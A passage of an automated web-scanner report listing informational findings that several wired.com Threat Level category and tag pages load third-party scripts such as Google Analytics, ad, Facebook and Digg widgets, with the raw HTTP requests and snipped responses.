Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:20:38 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=107
Expires: Wed, 12 Jan 2011 15:33:55 GMT
Date: Wed, 12 Jan 2011 15:32:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.131. http://www.wired.com/threatlevel/category/uncategorized/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/uncategorized/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/uncategorized/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:14:20 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=225
Expires: Wed, 12 Jan 2011 15:34:19 GMT
Date: Wed, 12 Jan 2011 15:30:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.132. http://www.wired.com/threatlevel/category/watchlists/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/watchlists/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/watchlists/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:20:46 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=52
Expires: Wed, 12 Jan 2011 15:33:09 GMT
Date: Wed, 12 Jan 2011 15:32:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 124936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.133. http://www.wired.com/threatlevel/category/wikileaks/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/wikileaks/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/wikileaks/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:49:59 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=304
Expires: Wed, 12 Jan 2011 15:33:17 GMT
Date: Wed, 12 Jan 2011 15:28:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.134. http://www.wired.com/threatlevel/category/yo-ho-ho/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/yo-ho-ho/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/yo-ho-ho/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:21:18 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=49
Expires: Wed, 12 Jan 2011 15:33:06 GMT
Date: Wed, 12 Jan 2011 15:32:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.135. http://www.wired.com/threatlevel/tag/4chan/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/4chan/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/4chan/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:25:55 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=43
Expires: Wed, 12 Jan 2011 15:33:33 GMT
Date: Wed, 12 Jan 2011 15:32:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.136. http://www.wired.com/threatlevel/tag/aclu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/aclu/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/aclu/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:25:56 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=48
Expires: Wed, 12 Jan 2011 15:33:46 GMT
Date: Wed, 12 Jan 2011 15:32:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.137. http://www.wired.com/threatlevel/tag/al-haramain/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/al-haramain/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/al-haramain/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:25:58 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=1
Expires: Wed, 12 Jan 2011 15:33:03 GMT
Date: Wed, 12 Jan 2011 15:33:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 142184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.138. http://www.wired.com/threatlevel/tag/albert-gonzalez/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/albert-gonzalez/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/albert-gonzalez/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:32:52 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=50
Expires: Wed, 12 Jan 2011 15:33:53 GMT
Date: Wed, 12 Jan 2011 15:33:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.139. http://www.wired.com/threatlevel/tag/apple-iphone/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/apple-iphone/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/apple-iphone/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:15 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=429
Expires: Wed, 12 Jan 2011 15:41:36 GMT
Date: Wed, 12 Jan 2011 15:34:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 124521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.140. http://www.wired.com/threatlevel/tag/blackhat/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/blackhat/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/blackhat/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:44:35 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=61
Expires: Wed, 12 Jan 2011 15:34:07 GMT
Date: Wed, 12 Jan 2011 15:33:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 119818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.141. http://www.wired.com/threatlevel/tag/bradley-manning/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/bradley-manning/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/bradley-manning/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 13:06:25 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=62
Expires: Wed, 12 Jan 2011 15:34:08 GMT
Date: Wed, 12 Jan 2011 15:33:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.142. http://www.wired.com/threatlevel/tag/carding/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/carding/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/carding/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:00 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=54
Expires: Wed, 12 Jan 2011 15:34:05 GMT
Date: Wed, 12 Jan 2011 15:33:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.143. http://www.wired.com/threatlevel/tag/ccc/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/ccc/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/ccc/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:01 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=87
Expires: Wed, 12 Jan 2011 15:34:45 GMT
Date: Wed, 12 Jan 2011 15:33:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117540

